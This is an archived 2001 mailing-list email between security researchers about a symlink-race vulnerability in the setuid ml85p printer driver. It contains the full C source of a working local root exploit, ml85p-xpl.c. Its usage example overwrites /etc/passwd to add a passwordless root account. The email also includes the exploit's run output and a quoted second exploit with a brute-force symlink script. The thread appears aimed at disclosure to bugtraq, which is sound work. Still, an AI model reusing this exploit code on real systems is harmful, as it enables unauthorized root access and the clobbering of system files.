Hey kev... I downloaded the source for this and have it compiled... Check this out [-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned by_core ml85p-xpl.c by core (c) 2001 > backing up /etc/rc.owned to /tmp/ez.TMwyqr /bin/cp: cannot stat `/etc/rc.owned': No such file or directory /bin/touch: getting attributes of `/etc/rc.owned': No such file or directory > creating a lot of symlinks Running a few times since I'm lazy. Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed Wrong file format. file position: 8 ml85p: no process killed -rw-rw-r-- 1 root staff 0 Jul 10 12:16 /etc/rc.owned > cleaning up All done. Enjoy! Wanna play with it a bit more but we should publish it to bugtraq soon. /* ml85p-xpl.c * * Quick hack to exploit ml85p * * Simply run it with the file you want to create/overwrite * and the data you wish to place in the file. * * Example: * * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl * $ ./ml85p-xpl /etc/passwd owned::0:0::/root:/bin/bash * * Then login as owned... etc.. * * by Charles Stevenson <coreat_private> * * July 10 2001 * * shoutz b10z */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #include <time.h> #define TEMPFILE "/tmp/ez.XXXXXX" #define BRUTE 10 void usage(char*); int main(int argc, char **argv){ char tempfile[128] = TEMPFILE; int fd, i; time_t the_time; char temp[512]; if (argc < 3){ usage(argv[0]); } if((fd = mkstemp(tempfile))==-1){ fprintf(stderr, "Error creating %s!\n",tempfile); exit(1); } /* begin lazy slacker coding */ fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n"); fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile); /* backup old file */ sprintf(temp, "/bin/cp %s %s", argv[1], tempfile); system(temp); /* set the date/time */ sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile); system(temp); the_time = time(NULL); fprintf(stderr, "> creating a lot of symlinks\n"); for (i=0;i<BRUTE;i++){ /* BAD CODE: sprintf(gname,"/tmp/ml85g%d",time(0)); */ sprintf(temp, "/tmp/ml85g%d", the_time+i); symlink(argv[1], temp); } sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s > file; ml85p -sf file 2>&1>/dev/null & sleep 1; killall ml85p\n", argv[2]); fprintf(stderr, "Running a few times since I'm lazy.\n"); for (i=0;i<BRUTE;i++){ system(temp); //sleep(1); } sprintf(temp, "/bin/ls -l %s", argv[1]); system(temp); fprintf(stderr, "> cleaning up\n"); sprintf(temp, "/bin/rm -f /tmp/ml85*"); system(temp); fprintf(stderr, "All done. Enjoy!\n"); return 0; } void usage(char *name){ fprintf(stderr, "usage: %s <filename> <data>\n", name); exit(1); } /* EOF */ Best Regards, Charles Stevenson (b10z ownz :) > [401070dd] iopl(0x3) = 0 > [400cf2bd] time(NULL) = 994462668 > [40100cbf] brk(0) = 0x8064544 > [40100cbf] brk(0x80646c4) = 0x80646c4 > [40100cbf] brk(0x8065000) = 0x8065000 > [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3 I might have to hack the code to get that far since I dont have the printer. > I am not sure what other OS's pick for permissions by defualt... > mandrake seems to not allow user access by default ... I don't know > what group you need to have access to use this feature. You can change the umask. > [d0tslash@linux d0tslash]$ /usr/bin/ml85p > bash: /usr/bin/ml85p: Permission denied > > [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p > -rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p* > > for shits and giggles lets see what happens if its got bad perms. > [root@linux exp]# chmod 4755 /usr/bin/ml85p If it's installed from the tarball the perms are ok for sploitin' [-(core@devastator:~/bleedingedge/ml85p-driver)> ls -l `which ml85p` -r-sr-sr-x 1 root staff 11196 Jul 10 11:25 /usr/local/bin/ml85p > in which case the results are as follows > > [d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times) > -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463605 > -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463607 > -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463608 > -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463609 > > [d0tslash@linux d0tslash]$ cat ml85p-exp.c > // ln -s /etc/oops /tmp/ml85`./ml85p-exp` > > #include <time.h> > #include <stdio.h> > int main(int argc,char **argv) > { > int x = time(NULL); > x = x + 30; > printf("%i\n", x); > } > > [d0tslash@linux d0tslash]$ cat ml85p.sh > #!/bin/bash > # krfinisterreat_private > echo "brute.sh <low> <hi>" > L=$1 > H=$2 > while [ $L -lt $H ] > do > ln -s /etc/oops /tmp/ml85g`./ml85p-exp` > let L=L+1 > done > > the following file is created. > -rw-r--r-- 1 root d0tslash 0 Jul 6 20:18 /etc/oops > > not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to print > owned::0:0:root:/root:/bin/bash to this driver and it may append it to the file in /tmp... I am not sure though... just an idea > -KF
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 11:44:59 PDT